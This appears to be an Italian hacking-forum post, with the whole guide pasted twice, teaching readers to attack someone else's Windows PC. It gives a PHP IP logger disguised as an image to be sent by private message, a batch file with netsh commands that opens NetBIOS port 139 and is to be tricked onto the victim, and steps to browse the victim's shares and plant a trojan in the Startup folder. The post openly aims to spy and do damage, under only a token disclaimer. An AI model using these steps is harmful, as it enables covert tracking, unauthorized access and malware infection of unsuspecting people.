Pubblicato da: Spacca
Ciao,
bye,
nick6
Avete capito bene...attacchiamo un determinato PC per prenderne il controllo, spiarne i file, fare danni...
Provate tutto su VOSTRI PC se no non va bene...
Allora...questa prima parte della "guida" punterà a trovare l'IP della
vostra "vittima" in modo efficace e discreto...e a farcelo addirittura
spedire per email.
Ovviamente se avete già l'IP della "vittima" o sapete come ottenerlo tramite altri modo potete saltare questa parte
la tecnica ke sfrutteremo è l'iniezione di codice php in una immagine...
Partiamo subito! Mi limito a illustrare i passaggi, rifletteteci bene sopra e capirete come funziona!
Requisiti:
1)Un PC con Windows
2)Un vostro host ke supporta php (consiglio altervista)
3)Qlke minuto di tempo e conoscenze basilari basilari del PC
Partiamo...
1)Scegliamo un'immagine...la nostra vittima dovrà vederla e concentrarsi
su d quella...senza sospettare ke gli stiamo fregando l'IP, non so, una
cosa divertente ke gli vogliamo far vedere o qlkosa di simile...
2)Mettiamola in una cartella...ke in qsta guida kiameremo "cart"
3)Inseriamo in blocco note queste righe cambiandone la seconda:
codice HTML:
$a="TUAMAIL@TUAMAIL.it";
$oggetto="ip";
$IP = $_SERVER[ 'REMOTE_ADDR' ];
$messaggio=$IP;
mail($a, $oggetto, $messaggio);
?>
e lo salviamo come "ipt.php" (virgolette INCLUSE) in "cart"
4)Andiamo su start > esegui > "cmd" > Invio
5)Attraverso il comando "cd" ci spostiamo nella cartella "cart"
6)A questo punto diamo il comando
codice HTML:
copy /b VOSTRA_IMMAGINE.JPG/GIF/PNG+ipt.php ip.php
(Con questo comando sommiamo i codici binari del file della vostra immagine e del file precedentemente creato con blocco note)
7)Uppiamo il nuovo file creatosi nella cartella "cart" (ip.php) nel nostro host
8)A questo punto non ci resta che trovare il modo di far vedere la
nostra immagine alla vittima attraverso internet (trovo utilissimo per
esempio mandargli un Messaggio Privato dei vari forum...)
Per far ciò scriviamo un messaggio ke nn lo induca a pensare ke gli stiamo fregando l'IP e aggiungere questo codice
codice HTML:
"http://VOSTROSITO.IT/ip.php">
cambiando ovviamente il valore di src con la posizione del file precedentemente uppato
9)Inviamogli il messaggio e appena lo leggere il suo IP vi verrà mandato
via mail! Controllate la posta molto frequentemente perchè quell'IP lo
dovrete usare subito...PRIMA KE SI DISCONNETTE DA INTERNET!
Ma vediamo cosa è successo...
La vittima ha letto il vostro messaggio...il nostro server ha ricavato
l'ip ke ha effettuato la rikiesta della pagina ip.php e ce l'ha mandato
via mail. Successivamente gli ha mandato l'intero file. Il browser della
vittima va alla ricerca dell'immagine contenuta nel file (proprio perchè
col codice di sopra abbiamo detto al browser ke si tratta di
un'immagine) e la mostra nel messaggio ricevuto dalla vittima.
Quest'ultima non sospetta d nnt a magari vi risponderà pure al messaggio
Dopo aver trovare l'ip della vittima è il momento di sferrare l'attacco vero e proprio.
Uno dei metodi + efficaci è quello di utilizzare il netbios, di default abilitato su tutti gli o.s. Windows
Vediamo un po' come sfruttarlo:
1)Scarikiamo innanzitutto un utilissimo programma x tutti gli hacker, un
port scanner (un programma ke ci permette di saxe le porte aperte in un
determinato IP), in questo caso la scelta cade su advanced port
scanner: MEGAUPLOAD - The leading online storage and file delivery service
2)Installiamo il programma e avviamolo
3)Inseriamo l'IP della vittima precedentemente trovato e premiamo scan
4)Aspettiamo il responso...
5)Se nell'elenco delle porte aperte è presente la 139 (o comunque una
porta che riporta la dicitura "netbios") siamo a cavallo...la vittima
non l'ha chiusa e il suo PC è molto vulnerabile
Se la porta nn è aperta...
codice HTML:
1)Aprire blocco note;
2)Scrivere:
CODICE@echo off
netsh firewall add portopening tcp 139
netsh firewall add portopening udp 139
netsh %*SYSTEMDRIVE%
3)Salvare come "nomekevolete.bat" (virgolette incluse)
4)Inviare il file alla vittima e trovare il modo di farglielo aprire
6)Non ci rimane che aprire explorer e inserire nella barra degli
indirizzi "\\IP_DELLA_VITTIMA" (senza virgolette) e dare INVIO. (es.
"\\88.168.25.2")
7)Tutte le cartelle condivise dal PC saranno totalmente accessibili da voi
Spiegato come accedere ad un PC remoto a partire dal suo IP vediamo ora
come poter interagire con esso, cioè eseguire programmi e modificare
impostazioni.
Il trucco sta nell'esecuzione automatica di Windows... come ben sapete
infatti in ogni menù avvio è presente una cartella, Esecuzione
automatica, i cui collegamenti interni ad essa vengono avviato
all'accensione del PC... Noi potremo così avviare qualunque programma
vogliamo semplicemente inserendone un collegamento in quella cartella.
Ma ecco un procedimento guidato...
1)Con il procedimento riportato prima apriamo le cartelle condivise della vittima...
La condizione fondamentale affinkè il processo funzioni è ke la cartella
home dell'utente principale del PC e dell'utente "All Users" sia
condivisa...
Se così non fosse seguire questo procedimento:
codice HTML:
1)Aprire blocco note;
2)Scrivere:
CODICE@echo off
netsh firewall add portopening tcp 139
netsh firewall add portopening udp 139
netsh %*SYSTEMDRIVE%
3)Salvare come "nomekevolete.bat" (virgolette incluse)
4)Inviare il file alla vittima e trovare il modo di farglielo aprire
2)Ci spostiamo nella cartella home dell'utente principale del PC
vittima (o se ciò non fosse possibile nella cartella home dell'utente
"All Users") e copiamo il file ke vogliamo far eseguire.
Un ottimo esempio di file da far eseguire è un trojan...
3)Ci spostiamo nella cartella home\Menu Avvio\Programmi\Esecuzione
automatica e creiamo un nuovo collegamento con i seguenti parametri:
nome: un nome ke volete, ke sia il + insospettabile possibile;
collegamento: percorso del file precedentemente copiato
4)Aspettiamo ke la vittima riavvia il PC ed ecco che il programma da noi copiato verrà automaticamente eseguito
Ora ke sapete come far avviare nel PC della vittima un qualsiasi programma praticamente avete carta bianca.
Guida creata unicamente a scopo informativo ne io ne italiandeath ci assumiamo responsabilità sull'uso che ne farete..
fonte:sciax2
Provate tutto su VOSTRI PC se no non va bene...
Allora...questa prima parte della "guida" punterà a trovare l'IP della
vostra "vittima" in modo efficace e discreto...e a farcelo addirittura
spedire per email.
Ovviamente se avete già l'IP della "vittima" o sapete come ottenerlo tramite altri modo potete saltare questa parte
la tecnica ke sfrutteremo è l'iniezione di codice php in una immagine...
Partiamo subito! Mi limito a illustrare i passaggi, rifletteteci bene sopra e capirete come funziona!
Requisiti:
1)Un PC con Windows
2)Un vostro host ke supporta php (consiglio altervista)
3)Qlke minuto di tempo e conoscenze basilari basilari del PC
Partiamo...
1)Scegliamo un'immagine...la nostra vittima dovrà vederla e concentrarsi
su d quella...senza sospettare ke gli stiamo fregando l'IP, non so, una
cosa divertente ke gli vogliamo far vedere o qlkosa di simile...
2)Mettiamola in una cartella...ke in qsta guida kiameremo "cart"
3)Inseriamo in blocco note queste righe cambiandone la seconda:
codice HTML:
$a="TUAMAIL@TUAMAIL.it";
$oggetto="ip";
$IP = $_SERVER[ 'REMOTE_ADDR' ];
$messaggio=$IP;
mail($a, $oggetto, $messaggio);
?>
e lo salviamo come "ipt.php" (virgolette INCLUSE) in "cart"
4)Andiamo su start > esegui > "cmd" > Invio
5)Attraverso il comando "cd" ci spostiamo nella cartella "cart"
6)A questo punto diamo il comando
codice HTML:
copy /b VOSTRA_IMMAGINE.JPG/GIF/PNG+ipt.php ip.php
(Con questo comando sommiamo i codici binari del file della vostra immagine e del file precedentemente creato con blocco note)
7)Uppiamo il nuovo file creatosi nella cartella "cart" (ip.php) nel nostro host
8)A questo punto non ci resta che trovare il modo di far vedere la
nostra immagine alla vittima attraverso internet (trovo utilissimo per
esempio mandargli un Messaggio Privato dei vari forum...)
Per far ciò scriviamo un messaggio ke nn lo induca a pensare ke gli stiamo fregando l'IP e aggiungere questo codice
codice HTML:
cambiando ovviamente il valore di src con la posizione del file precedentemente uppato
9)Inviamogli il messaggio e appena lo leggere il suo IP vi verrà mandato
via mail! Controllate la posta molto frequentemente perchè quell'IP lo
dovrete usare subito...PRIMA KE SI DISCONNETTE DA INTERNET!
Ma vediamo cosa è successo...
La vittima ha letto il vostro messaggio...il nostro server ha ricavato
l'ip ke ha effettuato la rikiesta della pagina ip.php e ce l'ha mandato
via mail. Successivamente gli ha mandato l'intero file. Il browser della
vittima va alla ricerca dell'immagine contenuta nel file (proprio perchè
col codice di sopra abbiamo detto al browser ke si tratta di
un'immagine) e la mostra nel messaggio ricevuto dalla vittima.
Quest'ultima non sospetta d nnt a magari vi risponderà pure al messaggio
Dopo aver trovare l'ip della vittima è il momento di sferrare l'attacco vero e proprio.
Uno dei metodi + efficaci è quello di utilizzare il netbios, di default abilitato su tutti gli o.s. Windows
Vediamo un po' come sfruttarlo:
1)Scarikiamo innanzitutto un utilissimo programma x tutti gli hacker, un
port scanner (un programma ke ci permette di saxe le porte aperte in un
determinato IP), in questo caso la scelta cade su advanced port
scanner: MEGAUPLOAD - The leading online storage and file delivery service
2)Installiamo il programma e avviamolo
3)Inseriamo l'IP della vittima precedentemente trovato e premiamo scan
4)Aspettiamo il responso...
5)Se nell'elenco delle porte aperte è presente la 139 (o comunque una
porta che riporta la dicitura "netbios") siamo a cavallo...la vittima
non l'ha chiusa e il suo PC è molto vulnerabile
Se la porta nn è aperta...
codice HTML:
1)Aprire blocco note;
2)Scrivere:
CODICE@echo off
netsh firewall add portopening tcp 139
netsh firewall add portopening udp 139
netsh %*SYSTEMDRIVE%
3)Salvare come "nomekevolete.bat" (virgolette incluse)
4)Inviare il file alla vittima e trovare il modo di farglielo aprire
6)Non ci rimane che aprire explorer e inserire nella barra degli
indirizzi "\\IP_DELLA_VITTIMA" (senza virgolette) e dare INVIO. (es.
"\\88.168.25.2")
7)Tutte le cartelle condivise dal PC saranno totalmente accessibili da voi
Spiegato come accedere ad un PC remoto a partire dal suo IP vediamo ora
come poter interagire con esso, cioè eseguire programmi e modificare
impostazioni.
Il trucco sta nell'esecuzione automatica di Windows... come ben sapete
infatti in ogni menù avvio è presente una cartella, Esecuzione
automatica, i cui collegamenti interni ad essa vengono avviato
all'accensione del PC... Noi potremo così avviare qualunque programma
vogliamo semplicemente inserendone un collegamento in quella cartella.
Ma ecco un procedimento guidato...
1)Con il procedimento riportato prima apriamo le cartelle condivise della vittima...
La condizione fondamentale affinkè il processo funzioni è ke la cartella
home dell'utente principale del PC e dell'utente "All Users" sia
condivisa...
Se così non fosse seguire questo procedimento:
codice HTML:
1)Aprire blocco note;
2)Scrivere:
CODICE@echo off
netsh firewall add portopening tcp 139
netsh firewall add portopening udp 139
netsh %*SYSTEMDRIVE%
3)Salvare come "nomekevolete.bat" (virgolette incluse)
4)Inviare il file alla vittima e trovare il modo di farglielo aprire
2)Ci spostiamo nella cartella home dell'utente principale del PC
vittima (o se ciò non fosse possibile nella cartella home dell'utente
"All Users") e copiamo il file ke vogliamo far eseguire.
Un ottimo esempio di file da far eseguire è un trojan...
3)Ci spostiamo nella cartella home\Menu Avvio\Programmi\Esecuzione
automatica e creiamo un nuovo collegamento con i seguenti parametri:
nome: un nome ke volete, ke sia il + insospettabile possibile;
collegamento: percorso del file precedentemente copiato
4)Aspettiamo ke la vittima riavvia il PC ed ecco che il programma da noi copiato verrà automaticamente eseguito
Ora ke sapete come far avviare nel PC della vittima un qualsiasi programma praticamente avete carta bianca.
Guida creata unicamente a scopo informativo ne io ne italiandeath ci assumiamo responsabilità sull'uso che ne farete..
fonte:sciax2
bye,
nick6
Profilo utente
Social
Messaggi privati
Soggetti controllati
Staff tools